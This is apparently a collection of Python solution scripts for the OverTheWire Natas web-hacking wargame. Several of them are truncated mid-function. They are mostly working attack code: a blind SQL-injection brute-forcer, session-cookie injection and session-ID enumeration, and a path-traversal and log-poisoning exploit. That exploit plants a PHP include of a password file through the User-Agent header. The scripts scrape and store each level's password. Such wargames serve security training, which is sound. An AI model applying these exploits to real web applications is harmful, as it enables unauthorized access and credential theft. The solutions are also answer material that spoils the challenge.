def main(): usr = '******' password = natas.get_credential(usr) b64 = base64.b64encode('%s:%s' % (usr, password)) response = requests.get(URL, headers={'Authorization': 'Basic %s' % b64}) regex = r"<!--The password for natas2 is (\w*?) -->" matches = re.finditer(regex, response.content, re.MULTILINE) for matchNum, match in enumerate(matches, start=1): found_password = match.group(1) break print('found password: %s' % found_password) print('adding to credentials file....') natas.save_credentials('natas2', found_password) print('done')
def main(): PASS = natas.get_credential(USER) b64 = base64.b64encode('%s:%s' % (USER, PASS)) response = requests.get(URL, headers={'Authorization': 'Basic %s' % b64}) regex = r"natas3:(\w+)" matches = re.finditer(regex, response.content, re.MULTILINE) password = None for match in matches: password = match.group(1) if password is not None: print('found password: %s' % password) print('adding to credentials file....') natas.save_credentials('natas3', password) print('done')
import requests, re, base64, natas B64 = 'Basic %s' % base64.b64encode( '%s:%s' % ('natas21', natas.get_credential('natas21'))) URL = 'http://natas21.natas.labs.overthewire.org/index.php?debug' CO_URL = 'http://natas21-experimenter.natas.labs.overthewire.org/index.php' def main(): cookie = inject() print('cookie: %s' % cookie) response = requests.get(URL, headers=dict(Authorization=B64), cookies=dict(PHPSESSID=cookie)) regex = r"Password: (\w+)" matches = re.finditer(regex, response.content, re.MULTILINE) for match in matches: print('found password: %s' % match.group(1)) print('adding to credentials....') natas.save_credentials('natas22', match.group(1)) print('done') break def inject(): cookie = requests.post(CO_URL, headers=dict(Authorization=B64), data={ 'align': 'center',
import re,requests,base64,natas,string USER='******' PASSWORD=natas.get_credential(USER) URL='http://natas15.natas.labs.overthewire.org/index.php' def main(): b64 = base64.b64encode('%s:%s' % (USER,PASSWORD)) password = '' running = True while (running): found = False for c in string.ascii_letters + string.digits : if (guessed_correct(password + c, b64)): password = password + c found = True print(password) break if (not found): break print('found password: %s' % password) print('adding to credentials....') natas.save_credentials('natas16',password) print('done')
import re, requests, base64, natas, string, random B64 = 'Basic %s' % base64.b64encode('%s:%s' % ('natas25',natas.get_credential('natas25'))) URL = 'http://natas25.natas.labs.overthewire.org/index.php?lang=..././logs/natas25_%s.log' USER_AGENT = '<?php include "/etc/natas_webpass/natas26"; ?>' def main(): session = random_string() response = requests.get( URL % session, headers= { 'Authorization':B64, 'User-Agent':USER_AGENT }, cookies=dict(PHPSESSID=session) ) regex = r"\[\d{2}\.\d{2}\.\d{4}\s\d{2}::\d{2}:\d{2}\]\s(\w{32})" matches = re.finditer(regex,response.content,re.MULTILINE) for match in matches: print('found password: %s' % match.group(1)) print('adding to credentials....') natas.save_credentials('natas26',match.group(1)) print('done') def random_string(string_length=20): letters = string.ascii_lowercase return ''.join(random.choice(letters) for i in range(string_length))
import natas, re, requests, base64 B64 = 'Basic %s' % base64.b64encode( '%s:%s' % ('natas19', natas.get_credential('natas19'))) URL = 'http://natas19.natas.labs.overthewire.org/index.php' """ natas20:admin 3239332d6e617461733230 natas20:admin1 3431332d6e617461733230 natas21:admin 3632372d6e617461733231 pattern shows static backend (after \x2d) when user stays the same. only changes when user is changed, not with password. first 3 bytes are a number similar to the one in natas18 """ USER = '******' PASSWORD = '******' def main(): for i in range(0, 641): if (i % 20 == 0): print('requesting: %d' % i) password = do_request(i) if (password is not None): print('found password at %d: %s' % (i, password)) print('adding to credentials....') natas.save_credentials('natas20', password) print('done') break